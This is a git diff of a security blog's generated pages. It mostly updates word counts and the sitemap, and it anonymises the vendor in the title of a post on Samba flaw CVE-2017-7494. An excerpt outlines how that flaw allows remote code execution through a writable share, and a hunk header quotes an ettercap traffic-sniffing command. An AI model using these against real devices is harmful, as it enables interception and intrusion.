<loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc> <loc>https://cool-y.github.io/2018/11/16/BIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)/</loc>
<lastmod>2019-04-15</lastmod> <lastmod>2019-04-15</lastmod>
</url> </url>
</urlset> </urlset>

2
bookmarks/index.html
View File

@ -512,7 +512,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

4
categories/IOT/index.html
View File

@ -388,7 +388,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -604,7 +604,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
categories/Pwn二进制漏洞/index.html
View File

@ -500,7 +500,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
categories/index.html
View File

@ -465,7 +465,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
categories/web/index.html
View File

@ -474,7 +474,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
categories/二进制/index.html
View File

@ -578,7 +578,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
categories/加密解密/index.html
View File

@ -474,7 +474,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
categories/杂七杂八/index.html
View File

@ -474,7 +474,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
categories/理论学习/index.html
View File

@ -474,7 +474,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
categories/顶会论文/index.html
View File

@ -526,7 +526,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
index.html
View File

@ -2293,7 +2293,7 @@ MiniUPnP项目提供了支持UPnP IGD(互联网网关设备)规范的软件。
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

16
page/2/index.html
View File

@ -733,7 +733,7 @@ WinDbg
<h1 class="post-title" itemprop="name headline"> <h1 class="post-title" itemprop="name headline">
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">小米路由器与Samba漏洞CVE-2017-7494</a></h1> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">某厂商路由器与Samba漏洞CVE-2017-7494</a></h1>
<div class="post-meta"> <div class="post-meta">
@ -785,7 +785,7 @@ WinDbg
<span id="/2019/03/25/Samba-CVE/" class="leancloud_visitors" data-flag-title="小米路由器与Samba漏洞CVE-2017-7494"> <span id="/2019/03/25/Samba-CVE/" class="leancloud_visitors" data-flag-title="某厂商路由器与Samba漏洞CVE-2017-7494">
<span class="post-meta-divider">|</span> <span class="post-meta-divider">|</span>
<span class="post-meta-item-icon"> <span class="post-meta-item-icon">
<i class="fa fa-eye"></i> <i class="fa fa-eye"></i>
@ -808,7 +808,7 @@ WinDbg
</span> </span>
<span title="字数统计"> <span title="字数统计">
1.6k 字 1.7k 字
</span> </span>
@ -822,7 +822,7 @@ WinDbg
</span> </span>
<span title="阅读时长"> <span title="阅读时长">
6 分钟 7 分钟
</span> </span>
</div> </div>
@ -845,11 +845,13 @@ WinDbg
小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下
服务器打开了文件/打印机共享端口445让其能够在公网上访问 服务器打开了文件/打印机共享端口445让其能够在公网上访问
共享文件拥有写 共享文件拥有写入权限
恶意攻击者需猜解Samba服务端共享目录的
... ...
<!--noindex--> <!--noindex-->
<div class="post-button text-center"> <div class="post-button text-center">
@ -2347,7 +2349,7 @@ ettercap嗅探智能设备和网关之间的流量sudo ettercap -i ens33 -T -q
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
page/3/index.html
View File

@ -795,7 +795,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

4
search.xml
View File

File diff suppressed because one or more lines are too long

32
sitemap.xml
View File

@ -1,6 +1,13 @@
<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<url>
<loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc>
<lastmod>2019-07-27T06:39:41.484Z</lastmod>
</url>
<url> <url>
<loc>https://cool-y.github.io/2019/07/10/x86basic/</loc> <loc>https://cool-y.github.io/2019/07/10/x86basic/</loc>
@ -155,13 +162,6 @@
</url> </url>
<url>
<loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
<lastmod>2019-04-15T07:35:38.082Z</lastmod>
</url>
<url> <url>
<loc>https://cool-y.github.io/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</loc> <loc>https://cool-y.github.io/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</loc>
@ -170,14 +170,21 @@
</url> </url>
<url> <url>
<loc>https://cool-y.github.io/2000/01/01/hello-world/</loc> <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
<lastmod>2019-04-15T07:35:38.082Z</lastmod>
</url>
<url>
<loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc>
<lastmod>2019-04-15T07:35:38.081Z</lastmod> <lastmod>2019-04-15T07:35:38.081Z</lastmod>
</url> </url>
<url> <url>
<loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc> <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>
<lastmod>2019-04-15T07:35:38.081Z</lastmod> <lastmod>2019-04-15T07:35:38.081Z</lastmod>
@ -190,11 +197,4 @@
</url> </url>
<url>
<loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc>
<lastmod>2019-04-15T07:35:38.080Z</lastmod>
</url>
</urlset> </urlset>

2
tags/AFL/index.html
View File

@ -499,7 +499,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

4
tags/CVE/index.html
View File

@ -310,7 +310,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/IoT/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/MiniUPnP/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/PE/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/QQ/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/SSH/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

4
tags/Samba/index.html
View File

@ -310,7 +310,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/TCPDUMP/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/USENIX/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/Windows/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/ctf/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/index.html
View File

@ -465,7 +465,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/itchat/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/linux/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/miio/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/pwn/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/python/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/web/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/wifi/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/中间人/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/二进制/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/侧信道攻击/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/取证/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/复原文件/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/密码/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/小米/index.html
View File

@ -551,7 +551,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/微信/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/拒绝服务攻击/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/数据库/index.html
View File

@ -499,7 +499,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/数据挖掘/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/文件格式/index.html
View File

@ -499,7 +499,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/栈溢出/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/模型实现/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/模糊测试/index.html
View File

@ -499,7 +499,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/漏洞/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/破解/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/硬件层/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/自然语言处理/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/访问控制/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/调试/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/路由器/index.html
View File

@ -499,7 +499,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

4
tags/远程执行/index.html
View File

@ -310,7 +310,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/逆向/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
tags/重放攻击/index.html
View File

@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>